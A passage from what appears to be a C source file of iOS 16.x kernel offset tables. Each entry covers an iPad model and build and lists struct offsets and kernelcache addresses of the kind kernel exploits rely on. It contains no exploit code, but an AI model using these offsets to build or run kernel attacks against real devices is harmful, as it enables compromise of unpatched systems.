0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a36d288, .kernelcache__gPhysBase = 0xfffffff007928010, .kernelcache__gPhysSize = 0xfffffff007928010 + 8, .kernelcache__gVirtBase = 0xfffffff0079261e8, .kernelcache__perfmon_devices = 0xfffffff00a3ab4f0, .kernelcache__perfmon_dev_open = 0xfffffff007ed75d0, .kernelcache__ptov_table = 0xfffffff0078db178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3aa990, .kernelcache__vm_pages = 0xfffffff0078d7eb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078da118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3aa988, .kernelcache__vn_kqfilter = 0xfffffff007f2641c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", .build_version = "20G5026e", .device_id = "iPad12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a451ab0, .kernelcache__gPhysBase = 0xfffffff0079441b8, .kernelcache__gPhysSize = 0xfffffff0079441b8 + 8, .kernelcache__gVirtBase = 0xfffffff007942370, .kernelcache__perfmon_devices = 0xfffffff00a491520, .kernelcache__perfmon_dev_open = 0xfffffff007f03d78, .kernelcache__ptov_table = 0xfffffff0078f79b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a490910, .kernelcache__vm_pages = 0xfffffff0078f4100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6958, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a490908, .kernelcache__vn_kqfilter = 0xfffffff007f52588, }, // iPad Gen 9th Cellular // // iPad Gen 9th Wifi // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:54 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8030", .build_version = "20C65", .device_id = "iPad12,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a29d178, .kernelcache__gPhysBase = 0xfffffff00784bb98, .kernelcache__gPhysSize = 0xfffffff00784bb98 + 8, .kernelcache__gVirtBase = 0xfffffff007849d78, .kernelcache__perfmon_devices = 0xfffffff00a2d8370, .kernelcache__perfmon_dev_open = 0xfffffff007eb4bd8, .kernelcache__ptov_table = 0xfffffff0077ff260, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2d7800, .kernelcache__vm_pages = 0xfffffff0077fc088, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe210, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2d77f8, .kernelcache__vn_kqfilter = 0xfffffff007f06f14, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D47", .device_id = "iPad12,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a5178, .kernelcache__gPhysBase = 0xfffffff00784bc80, .kernelcache__gPhysSize = 0xfffffff00784bc80 + 8, .kernelcache__gVirtBase = 0xfffffff007849e60, .kernelcache__perfmon_devices = 0xfffffff00a2e0370, .kernelcache__perfmon_dev_open = 0xfffffff007ebcbe8, .kernelcache__ptov_table = 0xfffffff0077ff2a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2df800, .kernelcache__vm_pages = 0xfffffff0077fc0c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2df7f8, .kernelcache__vn_kqfilter = 0xfffffff007f0ef14, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D67", .device_id = "iPad12,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a5178, .kernelcache__gPhysBase = 0xfffffff00784bc80, .kernelcache__gPhysSize = 0xfffffff00784bc80 + 8, .kernelcache__gVirtBase = 0xfffffff007849e60, .kernelcache__perfmon_devices = 0xfffffff00a2e0370, .kernelcache__perfmon_dev_open = 0xfffffff007ebcbe8, .kernelcache__ptov_table = 0xfffffff0077ff2a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2df800, .kernelcache__vm_pages = 0xfffffff0077fc0c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2df7f8, .kernelcache__vn_kqfilter = 0xfffffff007f0ef14, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8030", .build_version = "20F66", .device_id = "iPad12,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a36d288, .kernelcache__gPhysBase = 0xfffffff007928010, .kernelcache__gPhysSize = 0xfffffff007928010 + 8, .kernelcache__gVirtBase = 0xfffffff0079261e8, .kernelcache__perfmon_devices = 0xfffffff00a3ab4f0, .kernelcache__perfmon_dev_open = 0xfffffff007ed75d0, .kernelcache__ptov_table = 0xfffffff0078db178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3aa990, .kernelcache__vm_pages = 0xfffffff0078d7eb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078da118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3aa988, .kernelcache__vn_kqfilter = 0xfffffff007f2641c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", .build_version = "20G5026e", .device_id = "iPad12,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a451ab0, .kernelcache__gPhysBase = 0xfffffff0079441b8, .kernelcache__gPhysSize = 0xfffffff0079441b8 + 8, .kernelcache__gVirtBase = 0xfffffff007942370, .kernelcache__perfmon_devices = 0xfffffff00a491520, .kernelcache__perfmon_dev_open = 0xfffffff007f03d78, .kernelcache__ptov_table = 0xfffffff0078f79b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a490910, .kernelcache__vm_pages = 0xfffffff0078f4100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6958, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a490908, .kernelcache__vn_kqfilter = 0xfffffff007f52588, }, // iPad Mini 6 Wifi // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPad14,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a685190, .kernelcache__gPhysBase = 0xfffffff0078b80c8, .kernelcache__gPhysSize = 0xfffffff0078b80c8 + 8, .kernelcache__gVirtBase = 0xfffffff0078b62a8, .kernelcache__perfmon_devices = 0xfffffff00a6c03b0, .kernelcache__perfmon_dev_open = 0xfffffff007facfa8, .kernelcache__ptov_table = 0xfffffff00786b370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a6bf800, .kernelcache__vm_pages = 0xfffffff007868098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00786a330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a6bf7f8, .kernelcache__vn_kqfilter = 0xfffffff007ffcfd0, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPad14,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a691190, .kernelcache__gPhysBase = 0xfffffff0078b81b0, .kernelcache__gPhysSize = 0xfffffff0078b81b0 + 8, .kernelcache__gVirtBase = 0xfffffff0078b6390, .kernelcache__perfmon_devices = 0xfffffff00a6cc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007fad05c, .kernelcache__ptov_table = 0xfffffff00786b3b0, .kernelcache__vm_first_phys_ppnum = 